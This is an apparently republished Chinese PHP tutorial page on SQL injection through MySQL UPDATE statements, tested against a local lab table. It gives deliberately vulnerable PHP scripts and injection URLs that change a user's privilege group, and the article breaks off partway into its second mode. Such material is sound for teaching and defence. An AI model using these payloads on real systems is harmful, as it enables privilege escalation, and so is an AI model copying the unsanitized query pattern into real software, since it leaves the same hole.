欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  后端开发

UPDATE注射(mysql+php)的两个模式_PHP教程

程序员文章站 2022-06-09 09:54:58
...
一.测试环境:

  OS: Windowsxp sp2

  php: php 4.3.10 (

  mysql 4.1.9

  apache 1.3.33

  二.测试数据库结构:

-----start---

-- 数据库: `test`

--

-- --------------------------------------------------------

--

-- 表的结构 `userinfo`

--

CREATE TABLE `userinfo` (

`groudid` varchar(12) NOT NULL default ’1’,

`user` varchar(12) NOT NULL default ’heige’,

`pass` varchar(122) NOT NULL default ’123456’

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--

-- 导出表中的数据 `userinfo`

--

INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

------end-------
三.测试模式:

  1,变量没有带’’或""[MOD1] 



            //test1.php Mod1 


            $servername = "localhost"; 


            $dbusername = "root"; 


            $dbpassword = ""; 


            $dbname = "test"; 


            mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); 


            $sql = "update userinfo set pass=$p where user=’heige’";//
            

            $result = mysql_db_query($dbname, $sql); 


            $userinfo = mysql_fetch_array($result); 


            echo "
            
SQL Query:$sql

            
"; 


            ?>


  脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达

  到修改groupid的目的:

  那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql里查询:
mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user | pass |

+---------+-------+--------+

| 1 | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

  所以我们可以得到没有’’或"" update的注射是可以成功的,这个就是我们的模式1。

  2,变量带’’或""[MOD2]


//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//
$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

  为了关闭’我们构造$p应该为123456’,groudid=’2 提交:

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了’

  提交的语句变成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

mysql查询:

mysql> select * from userinfo;

+---------+-------+--------------------+

| groudid | user | pass |

+---------+-------+--------------------+

| 2 | heige | 123456’,groudid=’1 |

+---------+-------+--------------------+

1 row in set (0.00 sec)


  groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2:

//test3.php Mod2

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/508502.htmlTechArticle一.测试环境: OS:Windowsxpsp2 php:php4.3.10( mysql4.1.9 apache1.3.33 二.测试数据库结构: -----start--- --数据库:`test` -- ----------------------------------------...
UPDATE注射(mysql+php)的两个模式_PHP教程

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn核实处理。

相关文章

相关视频

网友评论

文明上网理性发言,请遵守 新闻评论服务协议

我要评论
  • UPDATE注射(mysql+php)的两个模式_PHP教程

    • 专题推荐

    作者信息
    UPDATE注射(mysql+php)的两个模式_PHP教程

    认证0级讲师

    发布技术文章
    • 最新文章
    • 热门排行
    推荐视频教程
  • UPDATE注射(mysql+php)的两个模式_PHP教程javascript初级视频教程
  • UPDATE注射(mysql+php)的两个模式_PHP教程jquery 基础视频教程
    • 视频教程分类

    :公益在线php培训,帮助PHP学习者快速成长!

    Copyright 2014-2021 https://www.php.cn/ All Rights Reserved | 苏ICP备2020058653号-1UPDATE注射(mysql+php)的两个模式_PHP教程关于我们免责申明赞助与捐赠广告合作

    UPDATE注射(mysql+php)的两个模式_PHP教程   UPDATE注射(mysql+php)的两个模式_PHP教程
    相关标签: UPDATE 注射 mysql+php 两个 模式 测试 环境 Windowsxpsp2 php php4.3.

    上一篇: php-fpm不工作,该如何处理

    下一篇: HTML的奇葩嵌套规则_html/css_WEB-ITnose

    推荐阅读